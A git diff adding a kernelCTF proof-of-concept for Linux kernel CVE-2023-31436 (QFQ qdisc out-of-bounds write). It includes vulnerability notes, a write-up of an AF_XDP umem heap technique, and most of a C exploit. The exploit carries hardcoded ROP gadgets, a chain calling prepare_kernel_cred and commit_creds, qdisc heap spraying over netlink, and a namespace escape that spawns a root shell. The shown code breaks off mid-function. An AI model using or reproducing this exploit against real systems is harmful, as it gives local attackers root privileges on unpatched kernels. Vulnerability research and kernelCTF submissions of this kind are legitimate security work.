00000000..1164f50e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/novel-techniques.md @@ -0,0 +1,19 @@ +As far as I am aware kernel heap data only attacks using kernel/user shared memory have +gained little to no attention yet. + +The `struct xdp_mem` with the `AF_XDP` socket ([docs](https://www.kernel.org/doc/html/latest/networking/af_xdp.html)) +used in this exploit seems to serve as a powerful primitive: +Advantages: +- Read / Write of "kernel" memory without restrictions (even fault shenanigans seem like a good idea, + though I did not explicitly look into this) +- No heap pointers required +- No size restrictions even though acting as a `kmalloc-128` object +- Very useful as a "fake list member" + +Disadvantages: +- One level of pointer indirection +- Initial pointer restricted to `kmalloc-128` +- Requires `CAP_NET_RAW` + +Depending on the primitives available unaligned pointer corruption may come in handy +when dealing with objects where the mapped member does not align with the desired pointer. diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..ad1842fe --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/vulnerability.md @@ -0,0 +1,74 @@ +Vulnerability Details +===================== + +CVE-2023-31436: qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX. + +This vulnerability affects the packet scheduler subsystem, specifically QFQ+. + +An attacker can utilize this vulnerability to cause a slab-out-of-bounds read/write in the `(dyn-)kmalloc-8192` cache. + +## Requirements + +A user needs to be able to modify qdiscs, thus requiring `CAP_NET_ADMIN`. +Naturally this will be obtained through usernamespaces, thus one may require `CONFIG_USER_NS`. + +The specific qdisc in question is QFQ, which needs to be enabled `CONFIG_NET_SCH_QFQ`. + +## History + +The fixing commit is https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3037933448f60f9acb705997eae62013ecb81e0d. +This is a fix for 3015f3d2a3cd ("pkt_sched: enable QFQ to support TSO/GSO"), which dates way back to 2011. +Based on this I assume 2.6.x+ is affected. + +## Triggering the Vulnerability + +In order to trigger the vulnerability an attacker needs to modify qfq classes +after modifying the MTU of the device to a large value (> 0x100000). +This can be trivially achieved for the loopback device. + +When changing a class and ommitting the `TCA_QFQ_LMAX` option, the `lmax` value is chosen according to the MTU of the device, without any additional checks [1]: +```c +// qfq_change_class() in net/sched/sch_qfq.c + +// .. + if (tb[TCA_QFQ_LMAX]) { + lmax = nla_get_u32(tb[TCA_QFQ_LMAX]); + if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) { + pr_notice("qfq: invalid max length %u\n", lmax); + return -EINVAL; + } + } else + lmax = psched_mtu(qdisc_dev(sch)); // [1] + +// .. + + qfq_init_agg(q, new_agg, lmax, weight); // [2] + } + +// .. + + qfq_add_to_agg(q, new_agg, cl); // [3] +``` + +`qfq_init_agg` will then set `new_agg->lmax` accordingly. +Eventually `qfq_add_to_agg()` [3] will initialize `new_agg->grp` when the call tree +reaches `qfq_update_agg()`: + +```c +// qfq_update_agg() in net/sched/sch_qfq.c + agg->budgetmax = new_num_classes * agg->lmax; + new_agg_weight = agg->class_weight * new_num_classes; + agg->inv_w = ONE_FP/new_agg_weight; + + if (agg->grp == NULL) { + int i = qfq_calc_index(agg->inv_w, agg->budgetmax, + q->min_slot_shift); + agg->grp = &q->groups[i]; // [4] + } +``` + +`qfq_calc_index()` performs some simple arithmetics to choose the final value, +but will not do any additional bounds checks. +Eventually this results in `agg->grp` pointing out-of-bounds [4] relative to the `q` object of type `struct qfq_sched` (in the `kmalloc-8192` cache). + +The group of the `qfq_aggregate` is used in several places, leading to OOB reads and writes. diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/Makefile new file mode 100644 index 00000000..d45a7b07 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/Makefile @@ -0,0 +1,11 @@ +all: exploit.c bin + $(CC) exploit.c -o bin/exploit -O3 -static + +exploit: exploit.c + $(CC) exploit.c -o exploit -O3 -static + +bin: + mkdir -p bin/ + +run: + ./bin/exploit diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit new file mode 100755 index 00000000..ac81ef57 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c new file mode 100644 index 00000000..153e3534 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c @@ -0,0 +1,1123 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1"); +_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2"); +_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4"); +_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8"); +_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1"); +_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2"); +_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4"); +_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8"); + +#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__) +#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__) + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} + +#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x +#define pad8(x) pad4(x), pad4(x) + +#define p64(x) (u8)(((x) >> 0) & 0xFF), \ + (u8)(((u64)(x) >> 8) & 0xFF), \ + (u8)(((u64)(x) >> 16) & 0xFF), \ + (u8)(((u64)(x) >> 24) & 0xFF), \ + (u8)(((u64)(x) >> 32) & 0xFF), \ + (u8)(((u64)(x) >> 40) & 0xFF), \ + (u8)(((u64)(x) >> 48) & 0xFF), \ + (u8)(((u64)(x) >> 56) & 0xFF) + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define PACK __attribute__((__packed__)) + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE) + +// GADGETS { +u64 find_task_by_vpid = 0xffffffff8110a0d0; +u64 switch_task_namespaces = 0xffffffff81111c80; +u64 commit_creds = 0xffffffff811136f0; +u64 prepare_kernel_cred = 0xffffffff811139d0; +u64 init_task = 0xffffffff836159c0; +u64 init_nsproxy = 0xffffffff83661680; +u64 oops_in_progress = 0xffffffff8419f478; +u64 mov_rdi_rax = 0xffffffff81041293; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp 0xffffffff82404440 {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3 +u64 pop_rcx_ret = 0xffffffff8102898c; // pop rcx; ret // 59c3 +u64 pop_rsi = 0xffffffff8101806c; // pop rsi; jmp 0xffffffff82404440 {taken}; ret // 5ee9ce1e4001c3 +u64 pop_rdi = 0xffffffff8102764d; // pop rdi; jmp 0xffffffff82404440 {taken}; ret // 5fe97e094001c3 +u64 push_rsi_jmp_rsi_0x39 = 0xffffffff818ca79b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639 + +u64 pop_rsp = 0xffffffff8100143b; // pop rsp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 5ce9ff2f4001c3 +u64 add_rsp_0x88 = 0xffffffff8103d43d; // add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 4881c488000000e9f76f3c01c3 + +u64 enter_pop_rbx_pop_rbp_pop_r12 = 0xffffffff81b14680; // enter 0, 0; pop rbx; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // c80000005b5d415ce9b3fd8e00c3 +// -> rbx = rbp, pop rbp, pop r12 +u64 mov_rbp_rbx_pop_rbx_pop_rbp = 0xffffffff8107ff46; // mov [rbp], rbx; pop rbx; pop rbp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 48895d005b5de9ef443801c3 +u64 push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12 = 0xffffffff81be0fed; // push qword ptr [rcx+rsi+0x5b]; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // ff74315b5d415ce947348200c3 + +// trailer of qfq_enqueue +// 0xffffffff81cd460f <+591>: lea -0x28(%rbp),%rsp +// 0xffffffff81cd4613 <+595>: mov %ecx,%eax +// 0xffffffff81cd4615 <+597>: pop %rbx +// 0xffffffff81cd4616 <+598>: pop %r12 +// 0xffffffff81cd4618 <+600>: pop %r13 +// 0xffffffff81cd461a <+602>: pop %r14 +// 0xffffffff81cd461c <+604>: pop %r15 +// 0xffffffff81cd461e <+606>: pop %rbp +// 0xffffffff81cd461f <+607>: jmp 0xffffffff82404440 <__x86_return_thunk> +u64 leave = 0xffffffff81cd460f; + +u64 add_rcx_edi = 0xffffffff81063063; // add [rcx], edi; ret // 0139c3 + +// } GADGETS + +#define FOR_ALL_OFFSETS(x) do { \ + x(find_task_by_vpid); \ + x(switch_task_namespaces); \ + x(commit_creds); \ + x(prepare_kernel_cred); \ + x(init_task); \ + x(init_nsproxy); \ + x(oops_in_progress); \ + x(mov_rdi_rax); \ + x(pop_rcx_ret); \ + x(pop_rsi); \ + x(pop_rdi); \ + x(push_rsi_jmp_rsi_0x39); \ + x(pop_rsp); \ + x(add_rsp_0x88); \ + x(enter_pop_rbx_pop_rbp_pop_r12); \ + x(mov_rbp_rbx_pop_rbx_pop_rbp); \ + x(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12); \ + x(leave); \ + x(add_rcx_edi); \ + } while(0) + +// Reverse calculation of the index in sch_qfq.c:qfq_calc_index +// Our desired index will be 27 so that the fake group resides at offset 288 into +// our large spray object. +#define _TARGET_INDEX 27 +#define _MIN_SLOT_SHIFT 25 +#define _NUM_CLS 1 +#define _CLS_WEIGHT 1 +#define _ONE_FP 0x40000000 +#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS) + +#define SIZEOF_QDISC_SIZE_TABLE 60 + +struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + + +struct hlist_head { + struct hlist_node * first; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct tcf_proto { + void* next; /* 0 8 */ + void * root; /* 8 8 */ + int (*classify)(void*, const struct tcf_proto *, void*); /* 16 8 */ + u16 protocol; /* 24 2 */ + + /* XXX 2 bytes hole, try to pack */ + u8 __pad0[2]; + + u32 prio; /* 28 4 */ + void * data; /* 32 8 */ + const void * ops; /* 40 8 */ + void * chain; /* 48 8 */ + u32 lock; /* 56 4 */ + u8 deleting; /* 60 1 */ + + /* XXX 3 bytes hole, try to pack */ + u8 __pad1[3]; + + /* --- cacheline 1 boundary (64 bytes) --- */ + u32 refcnt; /* 64 4 */ + + /* XXX 4 bytes hole, try to pack */ + u8 __pad2[4]; + + u8 rcu[16]; + struct hlist_node destroy_ht_node; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 95, holes: 3, sum holes: 9 */ + /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct tcf_proto) == 104); + +struct qfq_group { + u64 S; /* 0 8 */ + u64 F; /* 8 8 */ + unsigned int slot_shift; /* 16 4 */ + unsigned int index; /* 20 4 */ + unsigned int front; /* 24 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + long unsigned int full_slots; /* 32 8 */ + struct hlist_head slots[32]; /* 40 256 */ + + /* size: 296, cachelines: 5, members: 7 */ + /* sum members: 292, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; + +struct stab_payload { + u8 __pad1[288 - SIZEOF_QDISC_SIZE_TABLE]; + struct qfq_group group; + u8 __pad2[4098 - sizeof(struct qfq_group) - 288 - 4]; + u32 id; +} PACK; +_Static_assert(sizeof(struct stab_payload) > 4096 - SIZEOF_QDISC_SIZE_TABLE); + +// Our fake tcf_proto we will place into qfq_sched->filter_list +struct tcf_proto_payload { + union { + struct tcf_proto org; + u64 stack[100]; + }; +} PACK; + +static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +static u64 leak_kernel_base = 0; + +static void* payload = NULL; +static struct stab_payload fake_group = {0}; + +int get_kernel_base(); + +#ifndef ATTEMPT_LARGE_EVERY +#define ATTEMPT_LARGE_EVERY 17 +#endif + +void maybe_win() { + int fd = open("/proc/1/ns/mnt", O_RDONLY); + if (fd < 0) { + return; + } + + L("SUCCESS."); + setns(fd, 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + L("spawning shell .."); + char* argv[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, + }; + execve(argv[0], argv, NULL); + exit(1); +} + + +void prep_tcf_proto_payload(struct tcf_proto_payload* p) { + memset(p, 0, sizeof(*p)); + + // store framepointer at a sane address. + const u64 framepp = oops_in_progress; + + u8 rop[] = { + [0] = p64(add_rsp_0x88), + + [0x39] = p64(pop_rsp), + + [8 + 0x88] = p64(enter_pop_rbx_pop_rbp_pop_r12), + p64(framepp), + p64(0xdead000000000001), // scratch r12 + p64(mov_rbp_rbx_pop_rbx_pop_rbp), + p64(0xdead000000000002), // scratch rbx + p64(0xdead000000000003), // scratch rbp + p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88] = p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88 + 8 + 0x88] = p64(pop_rdi), + p64(init_task), + p64(prepare_kernel_cred), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(commit_creds), + + p64(pop_rdi), + p64(1), + p64(find_task_by_vpid), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(pop_rsi), + p64(init_nsproxy), + p64(switch_task_namespaces), + + // restore execution in qfq_enqueue + p64(pop_rcx_ret), + p64(framepp), + p64(pop_rdi), + p64(0x48), + p64(add_rcx_edi), + p64(pop_rsi), + p64(-0x5b), + p64(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12), + p64(0xdead000000000004), // scratch r12 + p64(leave), + }; + + _Static_assert(sizeof(rop) < sizeof(p->stack)); + memcpy(p->stack, rop, sizeof(rop)); + + p->org.protocol = 8; + p->org.classify = (void*)push_rsi_jmp_rsi_0x39; + p->org.ops = (void*)0xdead000000000000; +} + +void prep_stage1_large_payload(struct stab_payload* p) { + memset(p, 0, sizeof(*p)); + + // This index will control the bit we flip. + // 8192 - offsetof(struct Qdisc, privdata) - offsetof(struct qfq_sched, bitmaps)) // the rest of the first qdisc + // + 8192 // spacing of key payload + // + offsetof(struct Qdisc, privdata) + offsetof(struct qfq_sched, filter_list) // offset into the second qdisc + // (times 8 + FFS(0x80)) + p->group.index = (8192 - 384 - 72 + 8192 + 384 + 0) * 8 + 7; +} + +static int last_worker = 0; +static struct { + int pid; + void* stack; +} workers[200] = {0}; + +int spawn_worker(int (*target)(void*), void* arg) { + void* stack = workers[last_worker].stack; + + if (stack == NULL) { + stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + workers[last_worker].stack = stack; + } + + int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg); + + if (child < 0) { + return -1; + } + + workers[last_worker].pid = child; + last_worker++; + + return last_worker - 1; +} + +int kill_worker(int index) { + if (workers[index].pid > 0) { + kill(workers[index].pid, SIGKILL); + workers[index].pid = -1; + } + + if (index == last_worker - 1) { + last_worker--; + } + + return 0; +} + +int netlink_errno(int fd, struct nlmsghdr* nlh) { + assert(nlh->nlmsg_type == NLMSG_ERROR); + struct nlmsgerr* e = NLMSG_DATA(nlh); + assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e))); + + if (e->error != 0) { + E("netlink error: %d", e->error); + errno = -e->error; + } + + return e->error; +} + +int netlink_send_recv(int fd, void* buf, int size) { + struct iovec iov = { + .iov_base = buf, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + msg.msg_flags = MSG_TRUNC; + msg.msg_iov = NULL; + msg.msg_iovlen = 0; + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC); + if (iov.iov_len < 0) { + perror("recvmsg()"); + return -1; + } + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +static volatile int wake = 0; +static volatile int done = 0; +static volatile int qdisc_trigger_bug = 0; +static volatile int qdisc_trigger_payload = 0; +// event which will be set whenever control is handed over back to main +static EVENT_DEFINE(parent_notify, __EVENT_UNSET); + +int prepare_device(int s, int ifindex) { + struct nlmsghdr* nlh = calloc(1, 4096); + FAIL_IF(nlh == NULL); + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + // Up the device + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = IFF_UP; + data->ifi_change = 1; + + // Set MTU size, used to trigger the vulnerability + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + attr->nla_type = IFLA_MTU; + attr->nla_len = NLA_HDRLEN + 4; + u32* attr_data = (void*)attr + NLA_HDRLEN; + *attr_data = LMAX; + + nlh->nlmsg_len += attr->nla_len; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to prepare device!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a rsvp tcfilter, used to spray our tcf_proto object +int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = 0; + + u16 protocol = 8; + data->tcm_info = ((u32)prio << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "rsvp"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... + if (err != -EBUSY && err != 0) { + E("failed to create tcfilter!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic +int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(2, 8192); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "netem"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt); + + struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN; + netem_qopt->latency = 1000u * 1000 * 5000; // latency in us + netem_qopt->limit = 1; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create netem qdisc!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a qfq qdisc, main qdisc of interest +int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(1, 8192); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "qfq"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + + // This is the sizetable we spray alongside each qdisc + attr->nla_type = TCA_STAB; + attr->nla_len = NLA_HDRLEN; + + struct nlattr* nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_STAB_BASE; + nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec); + attr->nla_len += nested->nla_len; + + struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN; + sizespec->cell_log = 10; + sizespec->size_log = 0; + sizespec->cell_align = 0; + sizespec->overhead = 0; + sizespec->linklayer = 0; + sizespec->mpu = 0; + sizespec->mtu = 0; + sizespec->tsize = sizeof(struct stab_payload) / sizeof(u16); + + nested = (void*)nested + nested->nla_len; + nested->nla_type = TCA_STAB_DATA; + nested->nla_len = NLA_HDRLEN + sizespec->tsize * sizeof(u16); + attr->nla_len += nested->nla_len; + + fake_group.id++; + memcpy((void*)nested + NLA_HDRLEN, &fake_group, sizeof(fake_group)); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create qfq qdisc!"); + free(nlh); + return -1; + } + +free(nlh); +return 0; +} + +// Delete a class from a qdisc +int delete_class(int s, int ifindex, u32 handle) { + L("deleting class %x", handle); + + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_DELTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to delete class!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Add a helper class to a qdisc +int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = class_handle; + + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + struct nlattr* nested; + + do { + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN; + + if (lmax) { + nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_QFQ_LMAX; + nested->nla_len = NLA_HDRLEN + sizeof(u32); + attr->nla_len += nested->nla_len; + *(u32*)((void*)nested + NLA_HDRLEN) = lmax; + } + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create helper class!"); + free(nlh); + return -1; + } + free(nlh); + + if (sub_qdisc_handle != 0) { + return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle); + } + + return 0; +} + +int spray_one_umem(void* buf) { + struct xdp_umem_reg mr = {0}; + // __u64 addr; /* Start of packet data area */ + // __u64 len; /* Length of packet data area */ + // __u32 chunk_size; + // __u32 headroom; + // __u32 flags; + + mr.addr = (u64)buf; + mr.chunk_size = 0x1000; + mr.len = 4 * 0x1000; // anything other than 8 is fine (the protocol we try to classify with the fake proto) + mr.headroom = 0; + mr.flags = 0; + + int s = socket(AF_XDP, SOCK_RAW, 0); + FAIL_IF(s < 0); + + FAIL_IF(setsockopt(s, SOL_XDP, XDP_UMEM_REG, &mr, sizeof(mr)) < 0); + return s; +} + +// Worker to spray qdiscs and potentially trigger the vulnerabilty. +// Each worker will have its own network namespace and create qdiscs +// for the loopback device. +// We could create virtual devices, but here we are. +int bug_worker(void* arg) { + int i = *(int*)arg; + + FAIL_IF(_pin_to_cpu(0) != 0); + + const u32 handle = 0x10000000 | (i << 16); + const u32 handle_oob = handle | (1 << 0); + const u32 handle_help = handle | (1 << 1); + const u32 handle_faked1 = handle | (1 << 2); + + const u32 sub_handle_help = 0x20010000; + const u32 sub_handle_oob = 0x20020000; + + const int loindex = if_nametoindex("lo"); + + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // Up the device and set the MTU to LMAX, which will trigger the vulnerability + // later on. + if (prepare_device(s, loindex) < 0) { + return -1; + } + + // Prepare qfq qdisc without anything else. + // Eventually we will create everything of interest when we pull the trigger. + // Until that this qdisc serves as some kind of "grooming" object. + if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle) < 0) { + return -1; + } + + #define NUM_SOCKETS2 4 + int 